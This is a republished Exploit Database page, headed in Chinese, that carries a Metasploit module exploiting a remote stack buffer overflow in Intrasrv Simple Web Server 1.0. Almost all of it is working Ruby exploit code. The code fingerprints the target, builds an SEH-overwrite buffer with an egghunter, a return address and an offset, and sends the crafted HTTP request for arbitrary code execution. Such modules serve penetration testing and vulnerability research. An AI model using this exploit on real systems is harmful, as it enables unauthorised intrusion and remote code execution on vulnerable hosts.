Intrasrv 1.0 – Remote Buffer Overflow (Metasploit)

• Exploit Database
• 14 阅读

• 作者： Metasploit
  日期： 2013-08-15
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/27606/

• ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # Framework web site for more information on licensing and terms of use.
  # http://metasploit.com/framework/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
  
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Egghunter
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "Intrasrv 1.0 Buffer Overflow",
  'Description'=> %q{
  This module exploits a boundary condition error in Intrasrv Simple Web
  Server 1.0. The web interface does not validate the boundaries of an
  HTTP request string prior to copying the data to an insufficiently large
  buffer. Successful exploitation leads to arbitrary remote code execution
  in the context of the application.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'xis_one', # Discovery, PoC
  'PsychoSpy <neinwechter[at]gmail.com>' # Metasploit
  ],
  'References' =>
  [
  ['OSVDB', '94097'],
  ['EDB','18397'],
  ['BID','60229']
  ],
  'Payload'=>
  {
  'Space' => 4660,
  'StackAdjustment' => -3500,
  'BadChars' => "\x00"
  },
  'DefaultOptions'=>
  {
  'ExitFunction' => "thread"
  },
  'Platform' => 'win',
  'Targets'=>
  [
  ['v1.0 - XP / Win7',
  {
  'Offset' => 1553,
  'Ret'=> 0x004097dd #p/p/r - intrasrv.exe
  }
  ]
  ],
  'Privileged' => false,
  'DisclosureDate' => "May 30 2013",
  'DefaultTarget'=> 0))
  
  register_options(
  [
  OptPort.new('RPORT', [true, 'The remote port', 80])
  ], self.class)
  end
  
  def check
  begin
  connect
  rescue
  print_error("Could not connect to target!")
  return Exploit::CheckCode::Safe
  end
  sock.put("GET / HTTP/1.0\r\n\r\n")
  res = sock.get_once
  
  if res =~ /intrasrv 1.0/
  return Exploit::CheckCode::Vulnerable
  else
  return Exploit::CheckCode::Safe
  end
  end
  
  def exploit
  # setup egghunter
  hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
  :checksum=>true
  })
  
  # setup buffer
  buf = rand_text(target['Offset']-126) # junk to egghunter at jmp -128
  buf << hunter # egghunter
  buf << rand_text(target['Offset']-buf.length) # more junk to offset
  buf << "\xeb\x80" + rand_text(2)# nseh - jmp -128 to egghunter
  buf << [target.ret].pack("V*")# seh
  
  # second last byte of payload/egg gets corrupted - pad 2 bytes
  # so we don't corrupt the actual payload
  egg << rand_text(2)
  
  print_status("Sending buffer...")
  # Payload location is an issue, so we're using the tcp mixin
  # instead of HttpClient here to maximize control over what's sent.
  # (i.e. no additional headers to mess with the stack)
  connect
  sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n\r\n#{egg}\r\n\r\n")
  disconnect
  end
  end